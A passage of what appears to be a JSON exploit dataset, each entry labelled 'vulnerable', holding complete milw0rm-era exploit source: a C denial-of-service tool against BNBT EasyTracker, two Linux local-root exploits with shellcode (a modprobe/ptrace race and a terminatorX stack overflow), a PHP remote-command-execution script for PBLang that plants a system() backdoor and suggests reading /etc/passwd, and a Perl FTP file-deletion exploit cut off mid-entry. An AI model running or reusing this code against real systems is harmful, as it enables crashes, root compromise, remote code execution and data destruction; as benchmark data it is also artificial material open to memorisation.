1039        "content": "/* BNBT BitTorrent EasyTracker Remote Denial Of Service\n\n   \n\n   Versions:\n\n   Version 7.7r3.2004.10.27 and below\n\n  \n\n   Vendors:\n\n   http://bnbt.go-dedicated.com/\n\n   http://bnbteasytracker.sourceforge.net/\n\n   http://sourceforge.net/projects/bnbtusermods/\n\n\n\n   Bug find and coded by:\n\n   Sowhat@@secway@org\n\n   http://secway.org\n\n\n\n   This PoC will Crash the server.\n\n */\n\n\n\n#include <winsock2.h>\n\n#include <stdio.h>\n\n\n\n#pragma comment(lib, \"ws2_32.lib\")\n\n\n\nchar exploit[] = \n\n\n\n\"GET /index.htm HTTP/1.0\\r\\n:\\r\\n\\r\\n\";\n\n\n\nint main(int argc, char *argv[])\n\n{\n\n\tWSADATA wsaData;\n\n\tWORD wVersionRequested;\n\n\tstruct hostent  *pTarget;\n\n\tstruct sockaddr_in \tsock;\n\n\tchar *target;\n\n\tint port,bufsize;\n\n\tSOCKET mysocket;\n\n\t\n\n\tif (argc < 2)\n\n\t{\n\n\t\tprintf(\" ######################################################################\\r\\n\");\n\n\t\tprintf(\" #   BNBT BitTorrent EasyTracker DoS by sowhat <sowhat@@secway@org>   #\\r\\n\", argv[0]);\n\n\t\tprintf(\" #          This exploit will Crash the Server                        #\\r\\n\");\n\n\t\tprintf(\" #               http://www.secway.org                                #\\r\\n\");\t\t\n\n\t\tprintf(\" ######################################################################\\r\\n\");\n\n\t\tprintf(\" Usage:\\r\\n %s <targetip> [targetport] (default is 6969)\t\\r\\n\", argv[0]);\n\n\t\tprintf(\" Example:\\r\\n\");\n\n\t\tprintf(\"\t%s 1.1.1.1\\r\\n\",argv[0]);\n\n\t\tprintf(\"\t%s 1.1.1.1 8888\\r\\n\",argv[0]);\n\n\t\texit(1);\n\n\t}\n\n\n\n\twVersionRequested = MAKEWORD(1, 1);\n\n\tif (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;\n\n\n\n\ttarget = argv[1];\n\n\tport = 6969;\n\n\n\n\tif (argc >= 3) port = atoi(argv[2]);\n\n\tbufsize = 1024;\n\n\tif (argc >= 4) bufsize = atoi(argv[3]);\n\n\n\n\tmysocket = socket(AF_INET, SOCK_STREAM, 0);\n\n\tif(mysocket==INVALID_SOCKET)\n\n\t{\t\n\n\t\tprintf(\"Socket error!\\r\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tprintf(\"Resolving Hostnames...\\n\");\n\n\tif ((pTarget = gethostbyname(target)) == NULL)\n\n\t{\n\n\t\tprintf(\"Resolve of %s failed\\n\", argv[1]);\n\n\t\texit(1);\n\n\t}\n\n\n\n\tmemcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);\n\n\tsock.sin_family = AF_INET;\n\n\tsock.sin_port = htons((USHORT)port);\n\n\n\n\tprintf(\"Connecting...\\n\");\n\n\tif ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))\n\n\t{\n\n\t\tprintf(\"Couldn't connect to host.\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tprintf(\"Connected!...\\n\");\n\n\tprintf(\"Sending Payload...\\n\");\n\n\tif (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)\n\n\t{\n\n\t\tprintf(\"Error Sending the Exploit Payload\\r\\n\");\n\n\t\tclosesocket(mysocket);\n\n\t\texit(1);\n\n\t}\n\n\n\n\tprintf(\"Payload has been sent! Check if the webserver is dead.\\r\\n\");\n\n\tclosesocket(mysocket);\n\n\tWSACleanup();\n\n\treturn 0;\n\n}\n\n\n\n// milw0rm.com [2005-09-06]",
1040        "vulnerable": true
1041    },
1042    {
1043        "exploit_id": 12,
1044        "content": "/***********************************************\n\n*\t\t\t\t\t         \n\n*       Linux Kernel Module Loader Local R00t Exploit\t \n\n*\t              Up to 2.4.20\t\t\t\n\n*\t        By anonymous KuRaK\t\t\t\n\n*\t\t\t\t\t\t\n\n************************************************\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <signal.h>\n\n#include <fcntl.h>\n\n#include <errno.h>\n\n#include <unistd.h>\n\n#include <sys/types.h>\n\n#include <sys/stat.h>\n\n#include <sys/ptrace.h>\n\n#include <sys/wait.h>\n\n#include <sys/mman.h>\n\n#include <sys/time.h>\n\n#include <linux/user.h>\n\n\n\n\n\n\n\n#define TMPSIZE 4096\n\n#define FMAX 768\n\n#define UIDNUM 6\n\n#define MMSIZE (4096*1)\n\n#define MAXSTACK 0xc0000000\n\n\n\n//      where to put the root script\n\n#define SHELL \"/tmp/w00w00w\"\n\n\n\n//      what to open to run modprobe\n\n#define ENTRY \"/dev/dsp3\"\n\n\n\n\n\nstruct uids {\n\n    unsigned uid;\n\n    unsigned euid;\n\n    unsigned suid;\n\n    unsigned fsuid;\n\n};\n\n\n\n\n\n//      thanks to the epcs2.c code :-))\n\nchar shellcode[] = \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" \"\\x31\\xc0\\x31\\\n\nxdb\\xb0\\x17\\xcd\\x80\"\t/* setuid(0) */\n\n    \"\\x31\\xc0\\xb0\\x2e\\xcd\\x80\" \"\\x31\\xc0\\x50\\xeb\\x17\\x8b\\x1c\\x24\"\t\n\n/* execve(SHELL) */\n\n    \"\\x90\\x90\\x90\\x89\\xe1\\x8d\\x54\\x24\"\t/* lets be tricky */\n\n    \"\\x04\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x89\"\n\n    \"\\xc3\\x40\\xcd\\x80\\xe8\\xe4\\xff\\xff\" \"\\xff\" SHELL \"\\x00\\x00\\x00\\x00\";\n\n\n\n\n\n//      payload...\n\nchar *shellcmd = \"#!/bin/sh\\nid|wall\\necho \\\"Your kernel is buggy\\\"|wall\";\n\n\n\n\n\nvolatile int sig = 0;\n\nvolatile struct user_regs_struct regs;\n\n\n\n\n\nvoid sighnd(int v)\n\n{\n\n    sig++;\n\n}\n\n\n\n\n\nvoid fatal(const char *msg)\n\n{\n\n    printf(\"\\n\");\n\n    if (!errno) {\n\n\tfprintf(stderr, \"FATAL ERROR: %s\\n\", msg);\n\n    } else {\n\n\tperror(msg);\n\n    }\n\n    printf(\"\\n\");\n\n    fflush(stdout);\n\n    fflush(stderr);\n\n    exit(129);\n\n}\n\n\n\n\n\nvoid exploit(int pid)\n\n{\n\n    int i;\n\n\n\n    if (ptrace(PTRACE_GETREGS, pid, 0, &regs))\n\n\tfatal(\"ptrace: PTRACE_GETREGS\");\n\n    for (i = 0; i <= sizeof(shellcode); i += 4) {\n\n\tif (ptrace\n\n\t    (PTRACE_POKETEXT, pid, regs.eip + i, *(int *) (shellcode + i)))\n\n\t    fatal(\"ptrace: PTRACE_POKETEXT\");\n\n    }\n\n    if (ptrace(PTRACE_SETREGS, pid, 0, &regs))\n\n\tfatal(\"ptrace: PTRACE_SETREGS\");\n\n    ptrace(PTRACE_DETACH, pid, 0, 0);\n\n    kill(pid, SIGCONT);\n\n}\n\n\n\n\n\nint get_ids(FILE * fp, struct uids *uids)\n\n{\n\n    int i;\n\n    char tmp[TMPSIZE];\n\n\n\n\n\n    fseek(fp, 0, SEEK_SET);\n\n    for (i = 0; i < UIDNUM; i++)\n\n\tfgets(tmp, sizeof(tmp), fp);\n\n    return fscanf(fp, \"Uid: %u %u %u %u\", &uids->uid, &uids->euid,\n\n\t\t  &uids->suid, &uids->fsuid);\n\n}\n\n\n\n\n\nint main(int ac, char **av)\n\n{\n\n    int fd, pid, p, i;\n\n    char buf[TMPSIZE];\n\n    struct uids uids;\n\n    FILE *fp;\n\n\n\n\n\n    setpgrp();\n\n    setsid();\n\n    umask(022);\n\n    unlink(SHELL);\n\n    fd = open(SHELL, O_RDWR | O_CREAT | O_TRUNC, 0755);\n\n    fp = fdopen(fd, \"w+\");\n\n    fprintf(fp, \"%s\\n\", shellcmd);\n\n    fclose(fp);\n\n\n\n    pid = getpid() + 2;\n\n    snprintf(buf, sizeof(buf) - 1, \"/proc/%d/status\", pid);\n\n    printf(\"\\nModprobe pid %d, my pid %d\", pid, getpid());\n\n    fflush(stdout);\n\n    signal(SIGUSR1, sighnd);\n\n\n\n//      fork modprobe helper\n\n    if (!(p = fork())) {\n\n//      some nice work for exec_usermodehelper(), keep it busy!\n\n\tfor (i = 0; i < FMAX; i++) {\n\n\t    fd = open(\"/dev/zero\", O_RDWR);\n\n\t    mmap(NULL, MMSIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);\n\n\t}\n\n\tkill(getppid(), SIGUSR1);\n\n\twhile (!sig);\n\n\tprintf(\"\\nHelper (pid %d) requesting module...\", getpid());\n\n\tfflush(stdout);\n\n\tfd = open(ENTRY, O_RDONLY | O_NONBLOCK);\n\n\texit(0);\n\n    }\n\n//      synchronize with the child\n\n    else {\n\n\twhile (!sig);\n\n\tkill(p, SIGUSR1);\n\n\n\n//      wait for modprobe to run at unprivileged level\n\n\twhile (1) {\n\n\t    fd = open(buf, O_RDONLY);\n\n\t    if (fd > 0) {\n\n\t\tif (!(fp = fdopen(fd, \"r\")))\n\n\t\t    fatal(\"fdopen\");\n\n\t\tif (get_ids(fp, &uids) != 4\n\n\t\t    || (uids.uid != uids.euid || uids.uid != uids.suid\n\n\t\t\t|| uids.uid != uids.fsuid)) {\n\n\t\t    fatal(\"did not catch modprobe...try again later :-)\");\n\n\t\t}\n\n//      ok, it runs...\n\n\t\twhile (1) {\n\n\t\t    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL)) {\n\n\t\t\tfatal(\"PTRACE_ATTACH failed!\");\n\n\t\t    } else {\n\n\t\t\ti = 0;\n\n\t\t\tprintf(\"\\nAttached afterburner...\\n\");\n\n\t\t\tfflush(stdout);\n\n\t\t\twhile (ptrace(PTRACE_GETREGS, pid, 0, &regs)\n\n\t\t\t       || !regs.eip || regs.eip >= MAXSTACK) {\n\n\t\t\t    ptrace(PTRACE_SYSCALL, pid, NULL, NULL);\n\n\t\t\t    printf(\"\\rplease wait %d\", i++);\n\n\t\t\t    fflush(stdout);\n\n\t\t\t}\n\n\t\t\twaitpid(pid, NULL, WUNTRACED);\n\n\t\t\tprintf\n\n\t\t\t    (\"\\nValid EIP found EIP=%p\\nexploiting the bug, good luck... \",\n\n\t\t\t     regs.eip);\n\n\t\t\tfflush(stdout);\n\n\t\t\texploit(pid);\n\n\t\t\texit(0);\n\n\t\t    }\n\n\t\t}\n\n\t\tfclose(fp);\n\n\t    }\n\n\t}\n\n    }\n\n\n\n    return 0;\n\n}\n\n\n\n\n\n\n\n// milw0rm.com [2003-04-14]",
1045        "vulnerable": true
1046    },
1047    {
1048        "exploit_id": 120,
1049        "content": "/* TerminatorX V. <= 3.81 local root exploit by Li0n7\n\n *\n\n * Typical local stack-based overflow\n\n *\n\n * Bugs discovered by c0wboy from 0x333\n\n *\n\n * Contact Li0n7 voila fr\n\n *\n\n * Usage: ./terminatorX-exp [-r <RET>][-b [-s <STARTING_RET>]]\n\n *\n\n * -r <RET>: no bruteforcing, try to execute shellcode with <RET> as return address\n\n * -b: enables bruteforcing\n\n * -s: bruteforces by using return address from <STARTING_RET> to 0x00000000\n\n *\n\n * Example:\n\n *\n\n *root@li0n7:/tmp/test/exploits# ./terminatorX-exp -b\n\n *\n\n * exploit: terminatorX V. <= 3.81 local root exploit by Li0n7\n\n * discoverer: c0wb0y (www.0x333.org)\n\n * visit us: http://www.ioc.fr.st\n\n * contact me: Li0n7[at]voila[dot]fr\n\n * usage: ./xterminator2 [-r <RET>][-b [-s <STARTING_RET>]]\n\n *\n\n *[+] Starting bruteforcing...\n\n *[+] Testing 0xbffff734...\n\n *terminatorX Release 3.81 - Copyright (C) 1999-2003 by Alexander K\u00f6nig \n\n *terminatorX comes with ABSOLUTELY NO WARRANTY - for details read the license. \n\n *... \n\n *[+] Testing 0xbffff66c... \n\n *terminatorX Release 3.81 - Copyright (C) 1999-2003 by Alexander K\u00f6nig \n\n *terminatorX comes with ABSOLUTELY NO WARRANTY - for details read the license. \n\n *...\n\n *tX: err: Error parsing terminatorXrc.\n\n *tX: Failed loading terminatorXrc - trying to load old binary rc. \n\n *+ tX_warning: LADSPA_PATH not set. Trying /usr/lib/ladspa:/usr/local/lib/ladspa\n\n ** tX_error: tX: Error: couldn't access directory \"/usr/lib/ladspa\". \n\n *+ tX_warning: Plugin \"Sine Oscillator (Freq:audio, Amp:audio)\" disabled. Not a 1-in/1-out plugin. \n\n *+ tX_warning: Plugin \"Sine Oscillator (Freq:control, Amp:control)\" disabled. Not a 1-in/1-out plugin. \n\n *+ tX_warning: Plugin \"Stereo Amplifier\" disabled. Not a 1-in/1-out plugin. \n\n *+ tX_warning: Plugin \"White Noise Source\" disabled. Not a 1-in/1-out plugin.\n\n *warning: failed to load external entity \"%90%90...%90%901%C0Ph//shh/bin%...%BFl%F6%FF%BF\"\n\n *\n\n *(terminatorX:3085): WARNING **: Invalid UTF8 string passed to pango_layout_set_text() \n\n *sh-2.05b# exit *exit *[+] Exited: shell's ret code = 0 \n\n *[+] Ret address found: 0xbffff66c\n\n *\n\n */\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <unistd.h>\n\n#include <sys/wait.h>\n\n#include <sys/types.h>\n\n#include <errno.h>\n\n\n\n#define BSIZE 200\n\n#define D_START 0xbffff734\n\n#define PATH \"/usr/local/bin/terminatorX\"\n\n#define RET 0xbffff69e\n\n\n\nchar shellcode[]= \"\\x31\\xc0\\x50\\x68//sh\\x68/bin\\x89\\xe3\"\n\n      \"\\x50\\x53\\x89\\xe1\\x99\\xb0\\x0b\\xcd\\x80\";\n\n\n\nchar *buffer,*ptr;\n\n\n\nvoid\n\ncheckme(char *buffer)\n\n{\n\n      if(!buffer)\n\n      {\n\n          fprintf(stderr,\"[-] Can't allocate memory,exiting...\\n\");\n\n          exit(0);\n\n      }\n\n      return;\n\n}\n\n\n\n\n\nvoid\n\nexec_vuln()\n\n{\n\n      execl(PATH,PATH,\"-f\",buffer,NULL);\n\n}\n\n\n\n\n\nint\n\ntease()\n\n{\n\n      pid_t pid;\n\n      pid_t wpid;\n\n      int status;\n\n\n\n      pid = fork();\n\n\n\n      if ( pid == -1 ) {\n\n          fprintf(stderr, \" [-] %s: Failed to fork()\\n\", strerror(errno));\n\n          exit(13);\n\n\n\n      } else if ( pid == 0 ) {\n\n\n\n          exec_vuln();\n\n\n\n      } else {\n\n\n\n         wpid = wait(&status);\n\n         if ( wpid == -1 ) {\n\n\n\n             fprintf(stderr,\"[-] %s: wait()\\n\", strerror(errno));\n\n             return 1;\n\n\n\n         } else if ( wpid != pid )\n\n\n\n             abort();\n\n\n\n        else {\n\n\n\n            if ( WIFEXITED(status) ) {\n\n\n\n                printf(\"[+] Exited: shell's ret code = %d\\n\", WEXITSTATUS(status));\n\n                return WEXITSTATUS(status);\n\n\n\n            } else if ( WIFSIGNALED(status) ) {\n\n\n\n                return WTERMSIG(status);\n\n            } else {\n\n\n\n                fprintf(stderr, \"[-] Stopped.\\n\");\n\n\n\n            }\n\n        }\n\n      }\n\n      return 1;\n\n}\n\n\n\n\n\nint\n\nmake_string(long ret_addr)\n\n{\n\n      int i;\n\n      long ret,addr,*addr_ptr;\n\n\n\n      buffer = (char *)malloc(512);\n\n      if(!buffer)\n\n      {\n\n          fprintf(stderr,\"[-] Can't allocate memory, exiting...\\n\");\n\n          exit(-1);\n\n      }\n\n\n\n      ret = ret_addr;\n\n\n\n      ptr = buffer;\n\n\n\n      memset(ptr,0x90,BSIZE-strlen(shellcode));\n\n      ptr += BSIZE-strlen(shellcode);\n\n\n\n      for(i=0;i<strlen(shellcode);i++)\n\n          *ptr++ = shellcode[i];\n\n\n\n      addr_ptr = (long *)ptr;\n\n      for(i=0;i<20;i++)\n\n          *(addr_ptr++) = ret;\n\n      ptr = (char *)addr_ptr;\n\n      *ptr = 0;\n\n      return 0;\n\n}\n\n\n\n\n\nint\n\nbruteforce(long start)\n\n{\n\n      int ret;\n\n      long i;\n\n\n\n      fprintf(stdout,\"[+] Starting bruteforcing...\\n\");\n\n\n\n      for(i=start;i<0;i=i-50)\n\n      {\n\n          fprintf(stdout,\"[+] Testing 0x%x...\\n\",i);\n\n          make_string(i);\n\n          ret=tease();\n\n          if(ret==0)\n\n          {\n\n              fprintf(stdout,\"[+] Ret address found: 0x%x\\n\",i);\n\n              break;\n\n          }\n\n      }\n\n\n\n      return 0;\n\n}\n\n\n\nvoid\n\nbanner(char *argv0)\n\n{\n\n      fprintf(stderr,\"\\n exploit: terminatorX V. <= 3.81 local root exploit by Li0n7\\n\");\n\n      fprintf(stderr,\" discoverer: c0wb0y (www.0x333.org)\\n\");\n\n      fprintf(stderr,\" visit us: http://www.ioc.fr.st\\n\");\n\n      fprintf(stderr,\" contact me: Li0n7[at]voila[dot]fr\\n\");\n\n      fprintf(stderr,\" usage: %s [-r <RET>][-b [-s <STARTING_RET>]]\\n\\n\",argv0);\n\n}\n\n\n\nint\n\nmain(int argc,char *argv[])\n\n{\n\n      char * option_list = \"br:s:\";\n\n      int option,brute = 0, opterr = 0;\n\n      long ret,start = D_START;\n\n\n\n      banner(argv[0]);\n\n      if (argc < 1) exit(-1);\n\n\n\n      while((option = getopt(argc,argv,option_list)) != -1)\n\n          switch(option)\n\n          {\n\n              case 'b':\n\n                  brute = 1;\n\n                  break;\n\n              case 'r':\n\n                  ret = strtoul(optarg,NULL,0);\n\n                  make_string(ret);\n\n                  tease();\n\n                  exit(0);\n\n                  break;\n\n              case 's':\n\n                  start = strtoul(optarg,NULL,0);\n\n                  break;\n\n              case '?':\n\n                  fprintf(stderr,\"[-] option \\'%c\\' invalid\\n\",optopt);\n\n                  banner(argv[0]);\n\n                  exit(-1);\n\n          }\n\n\n\n      if(brute)\n\n          bruteforce(start);\n\n\n\n      return 0;\n\n}\n\n\n\n\n\n// milw0rm.com [2003-11-13]",
1050        "vulnerable": true
1051    },
1052    {
1053        "exploit_id": 1200,
1054        "content": "<?php\n\n/* PBLang 4.65 (possibly prior versions) remote code execution\n\n   by rgod -> site: http://rgod.altervista.org\n\n   make these changes in php.ini if you have troubles with this script:\n\n   allow_call_time_pass_reference = on\n\n   register_globals = on\t\t\t\t\t\t       */\n\n\n\n   error_reporting(0);\n\n   ini_set(\"max_execution_time\",0);\n\n   ini_set(\"default_socket_timeout\", 2);\n\n   ob_implicit_flush (1);\n\n\n\n   echo '<head><title>PBLang 4.65 remote commands execution</title>\n\n         <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">\n\n         <style type=\"text/css\">\n\n         <!--\n\n         body,td,th {color: #00FF00;}\n\n         body {background-color: #000000;}\n\n         .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }\n\n         .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;\n\n\t       font-weight: bold;\n\n\t       font-style: italic;\n\n              }\n\n         -->\n\n         </style></head>\n\n         <body>\n\n         <p class=\"Stile6\">PBLang 4.65 (possibly prior versions) remote commands execution</p>\n\n         <p class=\"Stile6\">a script by rgod at <a href=\"http://rgod.altervista.org\" target=\"_blank\">http://rgod.altervista.org</a></p>\n\n         <table width=\"84%\" >\n\n         <tr>\n\n         <td width=\"43%\">\n\n         <form name=\"form1\" method=\"post\" action=\"'.$SERVER[PHP_SELF].'?path=value&host=value&port=value&command=value&proxy=value\">\n\n         <p>\n\n         <input type=\"text\" name=\"host\">\n\n         <span class=\"Stile5\">hostname (ex: www.sitename.com) </span></p>\n\n         <p>\n\n         <input type=\"text\" name=\"path\">\n\n         <span class=\"Stile5\">path (ex: /pblang/ or /forum/ or just /) </span></p>\n\n         <p>\n\n         <input type=\"text\" name=\"port\">\n\n         <span class=\"Stile5\">specify a port other than 80 (default value) </span></p>\n\n         <p>\n\n         <input type=\"text\" name=\"command\">\n\n         <span class=\"Stile5\">a Unix command, example: ls -la to list directories, cat /etc/passwd to show passwd file </span></p>\n\n         <p>\n\n         <input type=\"text\" name=\"proxy\">\n\n         <span class=\"Stile5\">send exploit through an HTTP proxy (ip:port)  </span></p>\n\n         <p>\n\n         <input type=\"submit\" name=\"Submit\" value=\"go!\">\n\n         </p>\n\n         </form></td>\n\n         </tr>\n\n         </table>\n\n         </body>\n\n         </html>';\n\n\n\n\n\nfunction show($headeri)\n\n{\n\n$ii=0;\n\n$ji=0;\n\n$ki=0;\n\n$ci=0;\n\necho '<table border=\"0\"><tr>';\n\nwhile ($ii <= strlen($headeri)-1)\n\n{\n\n$datai=dechex(ord($headeri[$ii]));\n\nif ($ji==16) {\n\n             $ji=0;\n\n             $ci++;\n\n             echo \"<td>&nbsp;&nbsp;</td>\";\n\n             for ($li=0; $li<=15; $li++)\n\n                      { echo \"<td>\".$headeri[$li+$ki].\"</td>\";\n\n\t\t\t    }\n\n            $ki=$ki+16;\n\n            echo \"</tr><tr>\";\n\n            }\n\nif (strlen($datai)==1) {echo \"<td>0\".$datai.\"</td>\";} else\n\n{echo \"<td>\".$datai.\"</td> \";}\n\n$ii++;\n\n$ji++;\n\n}\n\nfor ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)\n\n                      { echo \"<td>&nbsp&nbsp</td>\";\n\n                       }\n\n\n\nfor ($li=$ci*16; $li<=strlen($headeri); $li++)\n\n                      { echo \"<td>\".$headeri[$li].\"</td>\";\n\n\t\t\t    }\n\n\n\necho \"</tr></table>\";\n\n}\n\n\n\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\n\n\n\n\n\nif (($path<>'') and ($host<>'') and ($command<>''))\n\n{\n\nif ($port=='') {$port=80;}\n\n\n\n$anumber=rand();\n\n\n\n         $data=\"user=jimihendrix\".$anumber.\"&pass=jimijimi&pass2=jimijimi&em=jimimail\".$anumber.\"@jimimail.com&realname=&alias=&msn=&icq=&aim=&yahoo=&qq=&web=http%3A%2F%2F&loc=\".urlencode('madrid\"; error_reporting(0); system($HTTP_GET_VARS[cmd]); echo \"') .\"&pt=colorgination.com+harness+racing+video&av=none&webav=&sig=&regcode=1126055838&lang=en&accept=1&Submit=Submit\";\n\n\n\nif ($proxy=='')\n\n        { $packet=\"POST \".$path.\"register.php?reg=2 HTTP/1.1\\r\\n\"; }\n\n        else\n\n        {\n\n        $c = preg_match_all($proxy_regex,$proxy,$is_proxy);\n\n        if ($c==0) {\n\n                    echo 'check the proxy...<br>';\n\n\t            die;\n\n\t           }\n\n         else\n\n\t{ $packet=\"POST http://\".$host.$path.\"register.php?reg=2 HTTP/1.1\\r\\n\";}\n\n\t}\n\n\n\n         $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\\r\\n\";\n\n         $packet.=\"Referer: \".$host.$path.\"register.php?reg=1\\r\\n\";\n\n         $packet.=\"Accept-Language: en\\r\\n\";\n\n         $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n\n         $packet.=\"Accept-Encoding: gzip, deflate\\r\\n\";\n\n         $packet.=\"User-Agent: msnbot/1.0 (+http://search.msn.com/msnbot.htm)\\r\\n\";\n\n         $packet.=\"Host: \".$host.\"\\r\\n\";\n\n         $packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n\n         $packet.=\"Connection: Keep-Alive\\r\\n\";\n\n         $packet.=\"Cache-Control: no-cache\\r\\n\\r\\n\";\n\n\t $packet.=$data;\n\n\n\nshow($packet);\n\nif ($proxy=='')\n\n           {$fp=fsockopen(gethostbyname($host),$port);}\n\n           else\n\n           {$parts=explode(':',$proxy);\n\n\t    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\n\n\t    $fp=fsockopen($parts[0],$parts[1]);\n\n\t    if (!$fp) { echo 'No response from proxy...';\n\n\t\t\tdie;\n\n\t\t       }\n\n\t    }\n\nfputs($fp,$packet);\n\n$data='';\n\nif ($proxy=='')\n\n{\n\nwhile (!feof($fp))\n\n{\n\n$data.=fgets($fp);\n\n}\n\n}\n\nelse\n\n{\n\n$data='';\n\n   while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))\n\n   {\n\n      $data.=fread($fp,1);\n\n   }\n\n\n\n}\n\nfclose($fp);\n\necho nl2br(htmlentities($data));\n\n\n\nif ($proxy=='')\n\n        { $packet=\"GET \".$path.\"setcookie.php?u=jimihendrix\".$anumber.\"%00&cmd=\".urlencode($command).\" HTTP/1.1\\r\\n\"; }\n\n        else\n\n        { $packet=\"GET http://\".$host.$path.\"setcookie.php?u=jimihendrix\".$anumber.\"%00&cmd=\".urlencode($command).\" HTTP/1.1\\r\\n\"; }\n\n\n\n         $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\\r\\n\";\n\n         $packet.=\"Referer: \".$host.$path.\"login.php\\r\\n\";\n\n         $packet.=\"Accept-Language: en\\r\\n\";\n\n         $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n\n         $packet.=\"Accept-Encoding: gzip, deflate\\r\\n\";\n\n         $packet.=\"User-Agent: Mozilla/5.0 (compatible; Konqueror/3.3; Linux) KHTML/3.3.2 (like Gecko)\\r\\n\";\n\n         $packet.=\"Host: \".$host.\"\\r\\n\";\n\n         $packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n\n         $packet.=\"Connection: Keep-Alive\\r\\n\";\n\n         $packet.=\"Cache-Control: no-cache\\r\\n\\r\\n\";\n\n//\t $packet.=$data;\n\nshow($packet);\n\nif ($proxy=='')\n\n           {$fp=fsockopen(gethostbyname($host),$port);}\n\n           else\n\n           {$parts=explode(':',$proxy);\n\n\t    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\n\n\t    $fp=fsockopen($parts[0],$parts[1]);\n\n\t    if (!$fp) { echo 'No response from proxy...';\n\n\t\t\tdie;\n\n\t\t       }\n\n\t    }\n\n\n\nfputs($fp,$packet);\n\n$data='';\n\nif ($proxy=='')\n\n{\n\nwhile (!feof($fp))\n\n{\n\n$data.=fgets($fp);\n\n}\n\n}\n\nelse\n\n{\n\n$data='';\n\n   while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))\n\n   {\n\n      $data.=fread($fp,1);\n\n   }\n\n\n\n}\n\nfclose($fp);\n\necho nl2br(htmlentities($data));\n\n\n\n}\n\n?>\n\n\n\n// milw0rm.com [2005-09-07]",
1055        "vulnerable": true
1056    },
1057    {
1058        "exploit_id": 1201,
1059        "content": "#!usr/bin/perl\n\n#\n\n#   FTP Internet Access Manager Command Exploit\n\n# ----------------------------------------------\n\n#      Infam0us Gr0up - Securiti Research\n\n#\n\n# Info: infamous.2hell.com\n\n# Vendor URL: www.softfolder.com/internet_access_manager.html\n\n# \n\n\n\nuse IO::Socket;\n\n\n\nif (@ARGV != 4) \n\n{ \n\nprint \"\\n FTP Internet Access Manager Command Exploit\\n\";\n\nprint \"---------------------------------------------\\n\\n\";\n\nprint \"[!] usage: perl $0 [host] [user] [pass] [*file]\\n\";\n\nprint \"[?] exam: perl $0 localhost admin 123 C:\\\\WINNT\\\\system32\\\\command.exe\\n\";\n\nprint \"*Only at dir Internet Access Manager was installed that user can delete\\nany files type(e.g C:\\\\)\\n\\n\"; \n\nexit ();\n\n} \n\n\n\n$adr = $ARGV[0];\n\n$user = $ARGV[1];\n\n$pass = $ARGV[2];\n\n$flz = $ARGV[3];\n\n\n\nprint \"\\n[+] Connect to $adr..\\n\";\n\n$remote = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>$adr,\n\nPeerPort=>21, Reuse=>1) or die \"Error: can't connect to $adr:21\\n\";\n\n\n\n$chr1 = \"\\x55\\x53\\x45\\x52\";\n\n$chr2 = \"\\x50\\x41\\x53\\x53\";\n\n\n\n$dll = \"\\x44\\x45\\x4c\\x45\";\n\n$tou = \"\\x70\\x6f\\x72\\x74\";\n\n$bel = \"\\x32\\x31\";\n\n\n\n$cowflaw = $tou.$bel;\n\n\n\n$tmp = \"\\x53\\x54\\x4f\\x55\";\n\n$chop = \"\\x4f\\x56\\x45\\x52\";\n\n\n\nprint \"[+] Connected\\n\";\n\n$remote->autoflush(1);\n\nprint \"[+] FTP Server ..ready\\n\";\n\n\n\nprint $remote \"$chr1 $user\\n\" and print \"[+] Send -> USER $user...\\n\" or die\n\n\"[-] Error: can't send user\\n\";\n\nsleep(1);\n\nprint $remote \"$chr2 $pass\\n\" and print \"[+] Send -> PASS $pass...\\n\" or die\n\n\"[-] Error: can't send pass\\n\";\n\nsleep(2);\n\nprint \"[+] User admin logged in\\n\";\n\nprint \"[+] Press[enter] to DELETE $flz\\n\";\n\n$bla= ;\n\nprint $remote \"$dll /$flz\\n\";\n\nsleep(2);\n\nprint \"[+] Success\\n\";\n\nsleep(1);\n\nprint \"[+] Sending trash mount..\\n\";\n\nsleep(1);\n\nprint $remote \"$cowflaw\\n\";\n\nprint $remote \"$tmp\\n\";\n\nprint \"[+] Trashing folder[1]..\\n\";\n\nprint $remote \"$tmp\\n\";\n\nprint \"[+] Trashing folder[2]..\\n\";\n\nprint $remote \"$tmp\\n\";\n\nprint \"[+] Trashing folder[3]..\\n\";\n\nprint $remote \"$tmp\\n\";\n\nprint \"[+] Trashing folder[4]..\\n\";\n\nprint $remote \"$tmp\\n\";\n\nprint \"[+] Trashing folder[5]..\\n\";\n\nprint $remote \"$tmp\\n\";\n\nprint \"[+] Trashing folder[6]..\\n\";\n\nprint $remote \"$tmp\\n\";\n\nprint \"[+] Trashing folder[7]..\\n\";\n\nprint $remote \"$tmp\\n\";\n\nprint \"[+] Trashing 